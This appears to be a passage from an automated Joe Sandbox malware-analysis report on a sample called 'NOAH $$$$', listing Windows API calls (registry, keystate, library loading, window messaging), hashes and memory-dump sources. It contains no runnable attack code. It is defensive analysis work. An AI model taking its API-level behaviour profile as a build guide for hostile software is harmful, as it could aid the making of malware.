                                                                                                                                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$_memmove_wcslen
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1589278365-1403004172
                                                                                                                                        • Opcode ID: 0014777097789b8f84f3fe106d7e17ae724925b3d4bce213ca40c56104f0711f
                                                                                                                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                        • Opcode Fuzzy Hash: 0014777097789b8f84f3fe106d7e17ae724925b3d4bce213ca40c56104f0711f
                                                                                                                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle
                                                                                                                                        • String ID: nul
                                                                                                                                        • API String ID: 2519475695-2873401336
                                                                                                                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle
                                                                                                                                        • String ID: nul
                                                                                                                                        • API String ID: 2519475695-2873401336
                                                                                                                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                        • String ID: Line:
                                                                                                                                        • API String ID: 1874344091-1585850449
                                                                                                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                        • API String ID: 0-1011021900
                                                                                                                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                        • GetFocus.USER32 ref: 0046157B
                                                                                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                        • __swprintf.LIBCMT ref: 00461608
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                                        • String ID: %s%d
                                                                                                                                        • API String ID: 2645982514-1110647743
                                                                                                                                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3488606520-0
                                                                                                                                        • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                        • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                        • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                        • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 15295421-0
                                                                                                                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2449869053-0
                                                                                                                                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3539004672-0
                                                                                                                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 327565842-0
                                                                                                                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2832842796-0
                                                                                                                                        • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                                                                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                                        • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                                                                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                        APIs
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
